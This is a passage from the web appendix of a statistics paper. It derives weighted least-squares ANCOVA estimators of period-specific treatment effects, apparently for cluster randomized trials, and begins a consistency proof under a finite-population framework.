}_{J\times J}\end{array}\right)\mathbf{A}^{-1}\mathbf{B}+\left(\begin{array}{c} \overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\end{array} \right)(\mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1}.\] We proceed by looking at \(\mathbf{B}_{2}\): \[\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array}\right)\mathbf{A }^{-1}\mathbf{B}=\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array} \right)\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{i}}{w_{j}^{0}w_{j}^ {1}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}\frac{1}{w_{j}}\end{array}\right)\left( \begin{array}{c}\frac{w_{i}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^ {1}-\overline{\mathbf{X}}_{1}^{0}\right)\\ \vdots\\ \frac{w_{i}^{0}w_{1}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{ X}}_{J}^{0}\right)\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right),\] with \[-\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array}\right)\mathbf{A }^{-1}\mathbf{B}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\bm {X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)=-\left( \begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)+\left( \begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)=\left( \begin{array}{c}\mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right),\] and thus \(\mathbf{B}_{2}=\mathbf{0}_{J\times p}\). 
For \(\mathbf{B}_{1}\), we first look at \(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C}\): \[\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C}=\left(\begin{array}{cc}\otimes_{j=1}^{J} \frac{w_{j}^{0}w_{1}^{1}}{w_{j}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}\end{array}\right)-\left(\begin{array} []{c}\frac{w_{j}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)\\ \vdots\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{ X}}_{J}^{0}\right)\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right)\mathbf{D}^{-1}\mathbf{C}\] \[=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{i}^{1}}{w_{j}}& \mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}\end{array}\right)\left(\begin{array} []{cc}\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\mathbf{I}_{J}\end{array}\right)-\left(\begin{array}{c} \overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right)\mathbf{D}^{-1}\mathbf{C}\right).\] Then \[\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\mathbf{I}_{J}\end{array}\right)-\left(\begin{array}{c}\overline{ \mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right)\mathbf{D}^{-1}\mathbf{C}=\left(\begin{array}[] {cc}\otimes_{j=1}^{J}\frac{w_{i}}{w_{j}^{0}w_{j}^{1}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}\frac{1}{w_{j}}\end{array}\right)\left( \mathbf{A}-\mathbf{BD}^{-1}\mathbf{C}\right),\] with \[\mathbf{B}_{1}=\left(\begin{array}{cc}\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_ {J\times J}\end{array}\right)-\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{ 1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\mathbf{D}^{- 1}\mathbf{C}\end{array}\right)\left(\mathbf{A}-\mathbf{BD}^{-1}\mathbf{C}\right)^{-1}=\left( \begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}}{w_{j}^{0}w_{j}^{1}}&\mathbf{0}_{ J\times J}\end{array}\right).\] Thus \[\widehat{\mathbf{\tau}}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline {\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}}{w_{j}^{0 }w_{j}^{1}}&\mathbf{0}_{J\times J}&\mathbf{0}_{J\times p}\end{array}\right)\left( \begin{array}{c}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{ X}}_{ijk}^{\prime}\end{array}\right)=\left(\begin{array}{c}\overline{y}_{1}(1)- \overline{y}_{1}(0)\\ \vdots\\ \overline{y}_{J}(1)-\overline{y}_{J}(0)\end{array}\right).\] We therefore have \[\widehat{\mathbf{\tau}} =\left(\begin{array}{c}\overline{y}_{1}(1)-\overline{y}_{1}(0) \\ \vdots\\ \overline{y}_{J}(1)-\overline{y}_{J}(0)\end{array}\right)-\left(\begin{array}[] {c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ 
\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}\] \[=\left(\begin{array}{c}\overline{u}_{1}(1)-\overline{u}_{1}(0) \\ \vdots\\ \overline{u}_{J}(1)-\overline{u}_{J}(0)\end{array}\right)=\left(\begin{array}[] {c}\left(\overline{y}_{1}(1)-\overline{\mathbf{X}}_{1}^{1}\widehat{\mathbf{\gamma}} \right)-\left(\overline{y}_{1}(0)-\widetilde{\mathbf{X}}_{1}^{0}\widehat{\mathbf{ \gamma}}\right)\\ \vdots\\ \left(\overline{y}_{J}(1)-\overline{\mathbf{X}}_{J}^{1}\widehat{\mathbf{\gamma}} \right)-\left(\overline{y}_{J}(0)-\widetilde{\mathbf{X}}_{J}^{0}\widehat{\mathbf{ \gamma}}\right)\end{array}\right).\] ### Web Appendix A1.2 ANCOVA II We apply the same centering approach to ANCOVA II, and obtain the following model: \[Y_{ijk}=\sum_{j^{\prime}=1}^{J}\beta_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}} +\sum_{j^{\prime}=1}^{J}\tau_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}}\widetilde {\mathbf{Z}}_{ij^{\prime}}+\sum_{j^{\prime}=1}^{J}\mathbb{I}_{ijk,j^{\prime}} \widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j^{\prime}}+e_{ijk}.\] Under ANCOVA II, we have the following design matrix \[\mathbf{D}_{i}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_ {N_{ij}}&\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}&\otimes_{j=1}^{J}\widetilde{\mathbf{X}}_ {ij}\end{array}\right).\] Then \[\mathbf{D}_{i}^{\prime}=\left(\begin{array}{c}\otimes_{j=1}^{J}\widetilde{Z}_{ij }\mathbf{1}_{N_{ij}}\\ \otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\\ \otimes_{j=1}^{J}\widetilde{\mathbf{X}}_{ij}^{\prime}\end{array}\right),\ \ \mathbf{W}_{i}=\otimes_{j=1}^{J}\mathbf{W}_{ij},\ \ \mathbf{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right),\ \ \mathbf{Y}_{i}=\left( \begin{array}{c}\mathbf{Y}_{i1}\\ \vdots\\ \mathbf{Y}_{iJ}\end{array}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{1},\ldots,\widehat{\tau}_{j},\widehat{\beta}_{1},\ldots,\widehat{ \beta}_{J},\widehat{\gamma}_{1}^{\prime},\ldots,\widehat{\gamma}_{J}^{\prime}) ^{\prime}=\left(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\right)^ {-1}\left(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}\right)\). 
\[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}=\sum_{i=1}^{ I}\left(\begin{array}{cc}\otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{ \prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\widetilde{Z}_{ ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J} \left(\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{\widetilde{X}}_{ij}\right)\\ \otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}\mathbf{\widetilde{X}}_{ij}^{\prime}\mathbf{ W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\widetilde{\mathbf{X}}_{ij}^{ \prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\mathbf{\widetilde {X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{\widetilde{X}}_{ij}\right)\end{array}\right)\] \[=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{j}^{ 1}}{w_{j}}&\mathbf{0}_{J\times J}&\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{j}^{1}}{w_{j} }\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\mathbf{X}}_{j}^{\prime}\right)\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}&\mathbf{0}_{J\times pJ}\\ \otimes_{j=1}^{J}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{ 1}-\overline{\mathbf{X}}_{j}^{0}\right)^{\prime}&\mathbf{0}_{pJ\times J}&\otimes_{j= 1}^{J}\sum_{i=1}^{N_{ij}}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}^{ \prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right),\] and \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}=\sum_{i=1}^{ I}\left(\begin{array}{cc}\left(\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{ \prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \left(\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \left(\otimes_{j=1}^{J}\widetilde{\mathbf{X}}_{ij}^{\prime}\right)\mathbf{W}_{i}\mathbf{Y} _{i}\end{array}\right)=\left(\begin{array}{c}\frac{w_{1}^{0}w_{1}^{1}}{w_{1} }\left(\overline{y}_{1}(1)-\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ik}Y_{ik}\overline{X}_{iik}^{\prime}\\ \vdots\\ \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ik}Y_{ik}\overline{X}_{ijk}^{\prime} \end{array}\right).\] Using properties of least squares, \((\widehat{\tau}_{j},\widehat{\beta}_{j},\widehat{\gamma}_{j}^{\prime})^{\prime}\) can be estimated individually focusing on \[\sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{D}_{ij}=\sum_{i= 1}^{I}\left(\begin{array}{cc}\widetilde{Z}_{ij}^{0}\mathbf{1}_{N_{ij}}^{\prime} \mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ ij}\mathbf{1}_{N_{ij}}&\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\widetilde{X} _{ij}\\ \widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\mathbf{1}_{N_{ ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij} \widetilde{X}_{ij}\\ \widetilde{Z}_{ij}\widetilde{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}& \widetilde{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&\widetilde{\mathbf{X} }_{ij}^{\prime}\mathbf{W}_{ij}\widetilde{X}_{ij}\end{array}\right)\] \[=\left(\begin{array}{cc}\frac{w_{j}^{0}w_{j}^{1}}{w_{j}}&0& \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\bm {X}}_{j}^{0}\right)\\ 0&w_{j}&\mathbf{0}_{p}^{\prime}\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{j}}\left(\overline{\mathbf{X}}_{j}^{1}-\overline{\bm 
{X}}_{j}^{0}\right)^{\prime}&\mathbf{0}_{p}&\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{X}_{ijk}\end{array}\right),\] and \[\sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}=\sum_{i= 1}^{I}\left(\begin{array}{cc}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ ij}\mathbf{Y}_{ij}\\ \mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\\ \widetilde{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\end{array}\right)=\left( \begin{array}{c}\frac{w_{j}^{0}w_{j}^{1}}{w_{1}}\left(\overline{y}_{j}(1)- \overline{y}_{j}(0)\right)\\ w_{j}\overline{Y}_{j}\\ \sum_{i=1}^{I}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^{\prime} \end{array}\right).\] Following the same matrix inversion arguments for ANCOVA I, the expression for \(\widehat{\tau}_{j}\) can be derived as \[\widehat{\tau}_{j}=\overline{y}_{j}(1)-\overline{y}_{j}(0)-\left(\overline{\mathbf{X} }_{j}^{1}-\overline{\mathbf{X}}_{j}^{0}\right)\widehat{\gamma}_{j}=\left(\overline{y}_ {j}(1)-\widetilde{\mathbf{X}}_{j}^{1}\widehat{\gamma}_{j}\right)-\left(\overline{y}_ {j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{\gamma}_{j}\right)=\overline{u}_{j}(1)- \overline{u}_{j}(0)\] ### Web Appendix A1.3 Ancova III If we include interactions between treatment indicator and covariate vector into the model, the design matrix, using the property of least squares, we can separately estimate \((\tau_{1}^{*},\ldots,\tau_{J}^{*},\boldsymbol{\eta}^{*\prime})^{\prime}\) and \((\beta_{1},\ldots,\beta_{J},\boldsymbol{\gamma}^{\prime})^{\prime}\). Without the loss of generality, we elaborate on \((\tau_{1}^{*},\ldots,\tau_{J}^{*},\boldsymbol{\eta}^{*\prime})^{\prime}\), and \((\beta_{1},\ldots,\beta_{J},\boldsymbol{\gamma}^{\prime})^{\prime}\) follows. The design matrix for the estimation of \((\tau_{1}^{*},\ldots,\tau_{J}^{*},\boldsymbol{\eta}^{*\prime})^{\prime}\) is \[\boldsymbol{D}_{i}=\left(\begin{array}{cc}\otimes_{j=1}^{J}Z_{ij}\mathbf{1}_ {N_{ij}}&\left(\otimes_{j=1}^{J}Z_{ij}\mathbf{I}_{N_{ij}}\right)\widetilde{ \boldsymbol{X}}_{i}\end{array}\right).\] Then \[\boldsymbol{D}_{i}^{\prime}=\left(\begin{array}{cc}\otimes_{j=1}^{J}Z_{ij} \mathbf{1}_{N_{ij}}^{\prime}\\ \widetilde{\boldsymbol{X}}_{i}^{\prime}\left(\otimes_{j=1}^{J}Z_{ij} \mathbf{I}_{N_{ij}}\right)\end{array}\right),\ \ \boldsymbol{W}_{i}=\otimes_{j=1}^{J}\boldsymbol{W}_{ij},\ \ \boldsymbol{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right),\ \ \boldsymbol{Y}_{i}=\left(\begin{array}{c} \boldsymbol{Y}_{i1}\\ \vdots\\ \boldsymbol{Y}_{iJ}\end{array}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{1}^{*},\ldots,\widehat{\tau}_{J}^{*},\widehat{\boldsymbol {\eta}}^{*\prime})^{\prime}=\left(\sum_{i=1}^{I}\boldsymbol{D}_{i}^{\prime} \boldsymbol{W}_{i}\boldsymbol{D}_{i}\right)^{-1}\left(\sum_{i=1}^{I} \boldsymbol{D}_{i}^{\prime}\boldsymbol{W}_{i}\boldsymbol{Y}_{i}\right)\). 
\[\sum_{i=1}^{I}\boldsymbol{D}_{i}^{\prime}\boldsymbol{W}_{i} \boldsymbol{D}_{i}\] \[=\sum_{i=1}^{I}\left(\begin{array}{cc}\otimes_{j=1}^{J}\left( Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\boldsymbol{W}_{ij}\mathbf{1}_{N_{ij}}\right)& \left(\otimes_{j=1}^{J}Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\right)\boldsymbol{W }_{i}\widetilde{\boldsymbol{X}}_{i}\\ \widetilde{\boldsymbol{X}}_{i}^{\prime}\boldsymbol{W}_{i}\left(\otimes_{j=1}^{J }Z_{ij}\mathbf{1}_{N_{ij}}\right)&\widetilde{\boldsymbol{X}}_{i}^{\prime} \left(\otimes_{j=1}^{J}Z_{ij}\mathbf{W}_{ij}\right)\widetilde{\boldsymbol{X}} _{i}\end{array}\right)\] \[=\left(\begin{array}{cc}w_{1}^{1}&w_{1}^{1}\widetilde{\boldsymbol {X}}_{1}^{1}\\ &\ddots&\vdots\\ \hline w_{1}\widetilde{\boldsymbol{X}}_{1}^{1\prime}&\cdots&w_{J}^{1} \widetilde{\boldsymbol{X}}_{J}^{1\prime}\end{array}\right),\] and \[\sum_{i=1}^{I}\boldsymbol{D}_{i}^{\prime}\boldsymbol{W}_{i} \boldsymbol{Y}_{i}=\sum_{i=1}^{I}\left(\begin{array}{c}\left(\otimes_{j=1}^{ J}Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\right)\boldsymbol{W}_{i}\boldsymbol{Y}_{i} \\ \sum_{j=1}^{J}Z_{ij}\widetilde{\boldsymbol{X}}_{ij}^{\prime}\boldsymbol{W}_{ij} \boldsymbol{Y}_{ij}\end{array}\right)=\left(\begin{array}{c}w_{1}^{1} \overline{y}_{1}(1)\\ \vdots\\ w_{1}^{J}\overline{y}_{J}(1)\\ \sum_{i=1}^{I}\sum_{j=1}^{J}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}\overline{ \boldsymbol{X}}_{ijk}^{\prime}\end{array}\right).\] Following similar arguments, we can first derive results for \[\widehat{\boldsymbol{r}}^{*}+\left(\begin{array}{c}\widetilde{\boldsymbol{X }}_{1}^{1}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{1}\end{array}\right)\widehat{\boldsymbol{\eta}} ^{*},\] and then obtain estimates for \(\widehat{\boldsymbol{\tau}}\) as \[\widehat{\boldsymbol{\tau}}^{*}=\left(\begin{array}{c}\overline{y}_{1}(1) \\ \vdots\\ \overline{y}_{J}(1)\end{array}\right)-\left(\begin{array}{c}\widetilde{ \boldsymbol{X}}_{1}^{1}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{1}\end{array}\right)\widehat{\boldsymbol{\eta}} ^{*}.\] Similarly, the estimate for \(\widehat{\boldsymbol{\beta}}\): \[\widehat{\boldsymbol{\beta}}=\left(\begin{array}{c}\overline{y}_{1}(0)\\ \vdots\\ \overline{y}_{J}(0)\end{array}\right)-\left(\begin{array}{c}\widetilde{ \boldsymbol{X}}_{1}^{0}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{0}\end{array}\right)\widehat{\boldsymbol{\gamma}}.\] Then \[\widehat{\boldsymbol{\tau}}^{w}=\widehat{\boldsymbol{\tau}}^{*}-\widehat{ \boldsymbol{\beta}}=\left(\begin{array}{c}\overline{y}_{1}(1)-\overline{y}_ {1}(0)\\ \vdots\\ \overline{y}_{J}(1)-\overline{y}_{J}(0)\end{array}\right)-\left(\begin{array}{c} \widetilde{\boldsymbol{X}}_{1}^{1}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{1}\end{array}\right)\widehat{\boldsymbol{\eta}} ^{*}+\left(\begin{array}{c}\widetilde{\boldsymbol{X}}_{1}^{0}\\ \vdots\\ \widetilde{\boldsymbol{X}}_{J}^{0}\end{array}\right)\widehat{\boldsymbol{\gamma}}\] \[=\left(\begin{array}{c}\left(\overline{y}_{1}(1)-\overline{\mathbf{X}}_{1}^{ \ast}\widehat{\mathbf{\eta}}^{\ast}\right)-\left(\overline{y}_{1}(0)-\overline{ \mathbf{X}}_{1}^{0}\overline{\gamma}\right)\\ \vdots\\ \left(\overline{y}_{J}(1)-\overline{\mathbf{X}}_{J}^{1}\widehat{\mathbf{\eta}}^{\ast} \right)-\left(\overline{y}_{J}(0)-\overline{\mathbf{X}}_{J}^{0}\overline{\gamma} \right)\end{array}\right)=\left(\begin{array}{c}\overline{u}_{1}(1)- \overline{u}_{1}(0)\\ \vdots\\ \overline{u}_{J}(1)-\overline{u}_{J}(0)\end{array}\right).\] ### Web Appendix A1.4 Ancora IV If we further allow for period-varying covariate effects into the fully-interacted model, using the properties 
of least squares, we can separately estimate \((\tau_{j}^{\ast},\mathbf{\eta}_{i}^{\ast\prime})^{\prime}\), \((\beta_{j},\mathbf{\gamma}_{j}^{\prime})^{\prime}\) for each \(j=1,\ldots,J\). Similar to the ANCOVA III, we start with the estimation of \((\tau_{j}^{\ast},\mathbf{\eta}_{j}^{\ast\prime})^{\prime}\), and \((\beta_{j},\mathbf{\gamma}_{j}^{\prime})^{\prime}\) follows. The design matrix is \[\mathbf{D}_{ij}=\left(\begin{array}{cc}Z_{ij}\mathbf{1}_{N_{ij}}&Z_{ij}\overline {\mathbf{X}}_{ij}\end{array}\right).\] Then \[\mathbf{D}_{i}^{\prime}=\left(\begin{array}{cc}Z_{ij}\mathbf{1}_{N_{ij}}\\ Z_{ij}\overline{\mathbf{X}}_{ij}^{\prime}\end{array}\right),\ \ \mathbf{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{j},\widehat{\mathbf{\eta}}_{j}^{\ast\prime})^{\prime}=\left( \sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{D}_{ij}\right)^{-1}\left( \sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\right)\), where \[\sum_{i=1}^{I}\mathbf{D}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{D}_{ij} =\sum_{i=1}^{I}\left(\begin{array}{cc}Z_{ij}\mathbf{1}_{N_{ij}} ^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\bm {W}_{ij}\widetilde{\mathbf{X}}_{ij}\\ Z_{ij}\overline{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}&Z_{ij} \overline{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\widetilde{\mathbf{X}}_{ij}\end{array}\right)\] \[=\left(\begin{array}{cc}w_{j}^{1}&w_{j}^{1}\overline{\mathbf{X}}_{ j}^{1}\\ w_{j}^{1}\overline{\mathbf{X}}_{j}^{1}&\sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right).\] \[\sum_{i=1}^{I}\mathbf{D}_{ij}\mathbf{W}_{ij}\mathbf{Y}_{ij}=\sum_{i=1}^{I}\left(\begin{array} []{cc}Z_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\\ Z_{ij}\overline{\mathbf{X}}_{ij}^{\prime}\mathbf{W}_{ij}\mathbf{Y}_{ij}\end{array}\right)= \left(\begin{array}{c}w_{1}^{1}\overline{y}_{j}(1)\\ \sum_{i=1}^{I}Z_{ij}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}}_{ijk}^ {\prime}\end{array}\right).\] Following similar arguments, we first obtain estimates for \(\widehat{\tau}_{j}^{\ast}\) as \[\widehat{\widehat{\tau}}_{j}=\overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{1} \widehat{\mathbf{\eta}}_{j}^{\ast}.\] Similarly, the estimate for \(\widehat{\beta}_{j}\): \[\widehat{\beta}_{j}=\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{ \mathbf{\gamma}}_{j}.\] Then \[\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{\ast}-\widehat{\beta}_{j}=\left( \overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{1}\widehat{\mathbf{\eta}}_{j}^{\ast} \right)-\left(\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{\mathbf{ \gamma}}_{j}\right)=\overline{u}_{j}(1)-\overline{u}_{j}(0).\] ## Web Appendix A2 Proof of Theorem 1 ### Web Appendix A2.1 Proof of consistency We can prove the consistency of \(\widehat{\tau}^{w}\) from the perspective of ratio estimators following Sections A.2.3 and A.3.2 in the Web Appendix of Schochet et al. (2021). We will elaborate on ANCOVA I, and the other three model-assisted estimators follow with some differences due to differences in the associated design matrices. #### Web Appendix A2.1.1 Ancova I We assume limiting values on the finite population parameters. 
Adopting the randomization regime under finite population in Middleton and Aronow (2015), we assume a sequence of \(c\) finite populations such that as \(c\rightarrow\infty\), and the finite population increases by replicating the original \(I\) clusters \(c\) times and the rollout occurs independently within each copy with \(I_{j}\) treated clusters in period \(j\), for \(j=1,\ldots,J\). Define the following for a finite population with \(I\) clusters: \[\overline{wY(1)}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}(1),\ \ \overline{wY(0)}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}(0),\ \ \overline{w}_{j}=\frac{1}{I}\sum_{i=1}^{I}w_{ij}.\] Given these definitions, we have the treatment effect in period \(j\) under finite population as \[\frac{\overline{wY(1)}_{j}}{\overline{w}_{j}}-\frac{\overline{wY(0)}_{j}}{ \overline{w}_{j}}.\] Further assume limiting values as \(I\rightarrow\infty\): \[\overline{wY(1)}_{j}\xrightarrow{p}\mu_{j}^{*}(1),\ \ 